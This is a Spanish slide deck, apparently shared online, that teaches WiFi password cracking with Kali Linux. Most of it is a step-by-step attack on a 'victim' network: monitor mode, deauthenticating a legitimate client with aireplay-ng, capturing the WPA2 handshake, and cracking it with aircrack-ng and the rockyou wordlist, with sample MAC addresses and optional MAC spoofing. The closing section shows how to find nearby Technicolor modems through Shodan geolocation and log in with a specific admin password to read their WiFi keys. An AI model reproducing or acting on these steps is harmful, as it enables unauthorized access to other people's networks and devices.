Descargar como pptx, pdf o txt
Descargar como pptx, pdf o txt
Está en la página 1de 39

HACKING CRACKING

DE CONTRASEÑAS WIFI
CONTENIDO
• ¿Qué es Kali Linux y por qué lo necesito?.
• ¿Qué es Hacking Cracking?.
• Protocolos de seguridad inalámbrica.
• ¿Qué es Hanshake?
• Ejemplo
¿Qué es Kali Linux y por qué lo
necesito?
• Más de 300 herramientas y aplicaciones relacionadas con la seguridad
informática, Nmap, Jack the Ripper o la suite Aircrack-ng.
• Kali Linux es la distribución de Linux líder de la industria en pruebas de
penetración y hacking ético.
• Es conocido por su capacidad de realizar pruebas de penetración o hackear.
• Poder explorar las debilidades en la seguridad de las redes y sistema.
• Una herramienta eficiente para el hacking.
Kernel y Software Modificado
• Kali se basa en Debian , por lo que utiliza la mayor parte de la arquitectura de software
desde allí, y encontrarás la mayor parte del software en Kali Linux tal y como se
encuentra en Debian.
• algunos paquetes fueron modificados para endurecer la seguridad y arreglar algunas
posibles vulnerabilidades. por ejemplo, está parcheado para permitir la inyección
inalámbrica en varios dispositivos. Kali Linux no depende de servidores y réplicas de
Debian, sino que construye los paquetes por sus propios servidores.
¿Qué es Hacking Cracking?

Hacking Cracking

Hacking es la búsqueda permanente de El término "cracking" hace referencia a la práctica


conocimientos en todo lo relacionado con que consiste en atacar sistemas informáticos y
sistemas informáticos, sus mecanismos de software con intención maliciosa. Por ejemplo, se
seguridad, las vulnerabilidades de los mismos, la puede crackear una contraseña para acceder a la
forma de aprovechar estas vulnerabilidades y cuenta de un usuario, o una red Wi-Fi pública para
los mecanismos para protegerse de aquellos interceptar los datos que circulan por ella.
que saben hacerlo.
¿Cómo evitar el cracking?
• No abra archivos adjuntos enviados desde direcciones de correo electrónico
sospechosas
• No envíe nunca su información bancaria ni números de tarjetas de crédito por
correo electrónico
• No utilice redes Wi-Fi públicas para actividades privadas
• Para protegerse del cracking. no abrir adjuntos de direcciones de correo
sospechosas, no enviar su información bancaria o de tarjetas de crédito por
correo electrónico ni utilizar redes Wi-Fi públicas para actividades
confidenciales. Pero lo mejor que se puede hacer para protegerse del
cracking es utilizar un potente software antivirus como Avast Antivirus.
Protocolos de seguridad inalámbrica
Protocolos de seguridad inalámbrica
Protocolos de seguridad inalámbrica
WPA2 y como Protejer su red WiFi

• WIFI Protected Access 2 – es un sistema para proteger las redes inalámbricas WIFI
Siendo uno o mejor dicho el mas seguro en estos días ya que su encriptación es mas
complicada de descifrar y por la misma la mas común usada en las redes de internet
WIFI.
• Aunque WPA2 ofrece más protección que WPA y, por lo tanto, ofrece aún más
protección que WEP, la seguridad de su router depende en gran medida de la
contraseña que usted establezca.
• Utilice tantos caracteres como sea posible en su Contraseña de red WiFi.
¿Qué es HANDSHAKE?
• Es una negociación entre cliente y router para preestablecer la conexión, para
capturar el handshake, no capturamos la clave si no una serie de parámetros, que
entre ellos va la contraseña Wifi cifrada.
• ¿Como se obtiene?

Este paquete solo se obtiene des autenticando a un cliente legítimo de la red y cuando
se vuelva a conectar con la red wifi, nosotros intervenimos con la herramienta
airodump.ng, una herramienta de la suite aircrack-ng que captura dicho fichero
semilla.
Ejemplo
¿Qué vamos a hacer?
Vamos a generar un ataque donde des-autenticamos a un usuario de la red
inalámbrica, escuchamos su asociación con la red y atacar con un diccionario
de trafico capturado.
• NECESARIO.
Computador con el sistema operativo kali Linux
Un adaptador LAN que sea compatible con el monitor
Una red wifi que será nuestra victima
Un diccionario de contraseñas
Saber si la tarjeta de red esta conectada a Kali.
#iwconfig
Deshabilitar o desactivar procesos que se puedan pegar a la
tarjeta de red inalámbrica.
##airmon-ng check kill
Activar la tarjeta de red inalámbrica, en algunas ocasiones
esto le cambiara el nombre, si se llama WLAN0 cambiara a
WLAN0MON indicando que esta en modo monitoreo.
#Airmon-ng start wland0
Ver las redes inalámbricas. # airodump-ng wland0 y Ctrl c para
detener.
Ver las redes inalámbricas.

BSSID: Dirección Mac del enrutador.

PWR: Intensidad de la señal medida por DB, por eso es negativa, entre mas cercano a cero es mas alta
la señal.

BEACONS: paquetes de tipo administrativo, donde esta la información de la red, nombre, tipo de
seguridad, etc.

DATA: Cantidad de trafico, entre mas data se puede romper la seguridad de la red. Aprox 25000.

CH: canal en el que esta trabajando la red.


Ver las redes inalámbricas.
MB: velocidad .

ENC: Encriptación WPA2.

CIPHER: Cifrado.

AUTH: Autenticación.

ESSID: Nombre de la red.

STATION: Mac Adres del dispositivo conectado a la red inalámbrica.


Capturar trafico de la red que queremos, esperar que monitoree y capture la
información, se obtiene el hanshake.
#airodump-ng –c (canal) - w (nombre) --bssid (bssid) wlan0mon
Abrir un nuevo terminal.
toca de autenticar a un dispositivo, sacarlo de la red para poder obtener la
contraseña.
#aireplay-ng -- help (para ver los ataques que podemos realizar)
Abrir un nuevo terminal.
toca de autenticar a un dispositivo, sacarlo de la red para poder obtener la
contraseña.
Tipo de ataque de autenticación -0(desconectar al dispositivo)
#Aireplay-ng -0 1 –a (bssid) –c (mac del dispositivo conectado) wlan0mon

Explicación: -0 (el tipo de ataque que queremos realizar en este caso es de


autenticación), 1 (la cantidad de veces que lo voy a hacer, negación de
servicio, no se puede conectar a la red), bssid (Mac), -c (Mac del equipo
conectado a la red), wlan0mon(interface de red)
Hacer eso hasta conseguir suficiente Trafico.
#ls -la (escoger el que mas pese . cap) los fragmentos que obtenemos cuando des
autenticamos el dispositivo
Romper la Contraseña.

#Aircrack-ng –w (Diccionario).text –b(Mac atacada) crackwpa2.cap


Se Rompe la contraseña.
Usando otro método, repetimos los primeros pasos:
1-Matamos todos los procesos que estén interfiriendo con nuestro dispositivo wifi
airmon-ng check kill
2-Detenemos nuestro dispositivo wlan0
wlan0 down
3-Cambiamos la mac de nuestro dispositivo (Opcional por seguridad)
macchanger –r wlan0
4-Colocamos nuestro dispositivo en modo monitor
iwconfig wlan0 mode monitor
5-Activamos nuestro dispositivo wlan0
ifconfig wlan0 up
6-Obtenemos la BSSID de la red victima
airodump-ng wlan0
7-Nos mantenemos a la escucha de que un cliente se desconecte
airodump-ng -c 6 -w eddy --bssid 00:1D:D3:49:3D:40 wlan0
8-Sacamos un cliente del modem (Lo hacemos abriendo otra terminal)
aireplay-ng --deauth 10 -a 00:1D:D3:49:3D:40 -c 00:3A:13:06:5D:5D wlan0
9-Desencriptamos las contraseñas obtenidas.
aircrack-ng -w '/usr/share/wordlists/rockyou.txt' '/root/eddy-01.cap’

Donde: rockyou.txt Es un archivo con contraseñas probadas lo puedes encontrar en


“/usr/share/wordlists/rockyou.txt.gz” (hay que descomprimirlo)
eddy-01.cap Es el archivo que se genero con airodump-ng
Shodan
1-Ingresan a Shodan en su navegador y se registran
2- Se dirigen a Google maps, colocan su direccion, y hacen click al lado del
indicador rojo de la direccion, les debera aparecer las coordenadas geograficas
3- En el buscador de shodan digitaremos: technicolor geo:4.579265,-74.158347 -
donde estos numeros son nuetras coordenadas geograficas anteriormente buscadas en
google maps.
4- Damos click en el recuadro rojo y nos enviara a logearnos
5- En Nombre de usuario digitaran admin y en contraseña: Uq-4GIt3M

Nos aparecera la inrefaz del modem technicolor


6- Nos dirgimos a wireless y depues primary network
7- Podemos ver en el Network Name el nombre de la red y si clikeamos el cuadro de
show key nos mostrara la contraseña.

También podría gustarte